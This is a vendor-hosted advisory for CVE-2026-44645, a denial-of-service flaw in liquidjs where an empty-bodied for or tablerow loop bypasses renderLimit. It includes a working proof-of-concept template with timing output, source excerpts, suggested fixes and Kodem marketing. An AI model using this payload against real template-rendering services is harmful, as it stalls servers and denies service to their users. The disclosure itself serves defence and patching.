Summary
The renderLimit option, documented in docs/source/tutorials/dos.md as the mechanism that "mitigates this by limiting the time consumed by each render() call", can be fully bypassed by a {% for %} (or {% tablerow %}) tag whose body is empty. The per-iteration time check is reached only when the body contains at least one template node, so a template like {%- for i in (1..N) -%}{%- endfor -%} iterates the full collection without ever consulting renderLimit. With a configured renderLimit of 50 ms, a single parseAndRenderSync call has been observed to consume 2.26 seconds (~45× over the limit) and scales linearly with N up to memoryLimit, allowing a low-privileged template author to wedge an event-loop thread for an attacker-chosen duration.
Details
Render.renderTemplates is the single point at which renderLimit is consulted:
// src/render/render.ts
14: public * renderTemplates (templates: Template[], ctx: Context, emitter?: Emitter): IterableIterator<any> {
15: if (!emitter) {
16: emitter = ctx.opts.keepOutputType ? new KeepingTypeEmitter() : new SimpleEmitter()
17: }
18: const errors = []
19: for (const tpl of templates) {
20: ctx.renderLimit.check(getPerformance().now())
21: try {
22: const html = yield tpl.render(ctx, emitter)
...
32: }
The check at line 20 lives inside the for (const tpl of templates) body. When templates.length === 0, the loop body never executes, so the limiter is never consulted on that invocation.
The for tag re-enters renderTemplates once per collection item with no independent time check:
// src/tags/for.ts
70: for (const item of collection) {
71: scope[this.variable] = item
72: ctx.continueCalled = ctx.breakCalled = false
73: yield r.renderTemplates(this.templates, ctx, emitter)
74: if (ctx.breakCalled) break
75: scope.forloop.next()
76: }
When {%- for i in (1..N) -%}{%- endfor -%} is parsed, this.templates is []. Each of the N calls to r.renderTemplates(this.templates, ctx, emitter) therefore performs zero renderLimit.check() calls and zero template work, it just spins the JS-level for loop and the generator boilerplate. With N = 30_000_000 this still costs ~2.26 s of CPU, and N = 100_000_000 costs ~9.6 s, fully bypassing whatever wall-clock budget the integrator configured.
The range expression itself is bounded only by memoryLimit:
// src/render/expression.ts:67-72
function * evalRangeToken (token: RangeToken, ctx: Context) {
const low: number = yield evalToken(token.lhs, ctx)
const high: number = yield evalToken(token.rhs, ctx)
ctx.memoryLimit.use(high - low + 1)
return range(+low, +high + 1)
}
So the maximum bypass is governed by the (separate) memoryLimit, not by renderLimit. Integrators following the docs/source/tutorials/dos.md guidance, which positions renderLimit as the time-based defense, get no time-based defense at all on this code path.
PoC
Reproduced against [email protected] (HEAD 34877950):
# Empty for-body bypasses renderLimit (50 ms) and runs for ~2.26 s:
$ node -e "const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e9, renderLimit: 50 });
const t = Date.now();
engine.parseAndRenderSync('{%- for i in (1..30000000) -%}{%- endfor -%}', {});
console.log('Took', Date.now()-t, 'ms');"
Took 2255 ms
# Same template with a single-character body is correctly bounded:
$ node -e "const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e9, renderLimit: 50 });
try { engine.parseAndRenderSync('{%- for i in (1..30000000) -%}.{%- endfor -%}', {}); }
catch(e) { console.log('correctly threw:', e.message); }"
correctly threw: template render limit exceeded, line:1, col:1
Scaling N:
N = 30_000_000→ 2255 ms (≈ 45× over the 50 ms limit)N = 100_000_000→ 9581 ms (≈ 191× over the 50 ms limit)
Time grows linearly with N, capped only by memoryLimit (default Infinity, so the only cap by default is process memory).
Impact
Any liquidjs integrator who follows the upstream DoS guidance and sets a finite renderLimit to bound per-render CPU, typical for SaaS / multi-tenant environments where end users author templates (themes, email templates, snippets), does not get the bound they configured. A single template submission can keep an event-loop thread busy for seconds, which on a Node.js server is sufficient to stall all in-flight requests on that worker. With a large enough range and a permissive memoryLimit, the wedge time is attacker-controlled. No data is exposed and no integrity is harmed; impact is availability only.
Crafted input forces the application to consume excessive CPU, memory, or other resources, degrading or denying service. Typical impact: denial of service.
CVE-2026-44645 has a CVSS score of 6.5 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Move the renderLimit check to a location that runs unconditionally per renderTemplates invocation, so a zero-template body still triggers it; alternatively (or additionally) have iteration tags that invoke renderTemplates per element check the limiter themselves once per iteration.
// src/render/render.ts, check at function entry, before the templates loop
public * renderTemplates (templates: Template[], ctx: Context, emitter?: Emitter): IterableIterator<any> {
if (!emitter) {
emitter = ctx.opts.keepOutputType ? new KeepingTypeEmitter() : new SimpleEmitter()
}
ctx.renderLimit.check(getPerformance().now()) // <-- runs even when templates is empty
const errors = []
for (const tpl of templates) {
ctx.renderLimit.check(getPerformance().now())
...
}
...
}
And/or, defensively, in the iteration tags themselves so the guard cost is paid once per element rather than only at re-entry:
// src/tags/for.ts (around line 70)
for (const item of collection) {
ctx.renderLimit.check(getPerformance().now()) // <-- per-iteration time check
scope[this.variable] = item
ctx.continueCalled = ctx.breakCalled = false
yield r.renderTemplates(this.templates, ctx, emitter)
if (ctx.breakCalled) break
scope.forloop.next()
}
// src/tags/tablerow.ts (around line 54), analogous addition
for (let idx = 0; idx < collection.length; idx++, tablerowloop.next()) {
ctx.renderLimit.check(getPerformance().now())
...
}
The same hardening should be applied anywhere a tag drives an attacker-influenced loop count over a (potentially empty) templates array.
Frequently Asked Questions
- What is CVE-2026-44645? CVE-2026-44645 is a medium-severity uncontrolled resource consumption vulnerability in liquidjs (npm), affecting versions <= 10.25.7. No fixed version is listed yet. Crafted input forces the application to consume excessive CPU, memory, or other resources, degrading or denying service.
- How severe is CVE-2026-44645? CVE-2026-44645 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of liquidjs are affected by CVE-2026-44645? liquidjs (npm) versions <= 10.25.7 is affected.
- Is there a fix for CVE-2026-44645? No fixed version is listed for CVE-2026-44645 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-44645 exploitable, and should I be worried? Whether CVE-2026-44645 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-44645 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44645? No fixed version is listed yet. In the interim: Apply input size limits and request rate limiting. Reject input that exceeds reasonable bounds before processing begins.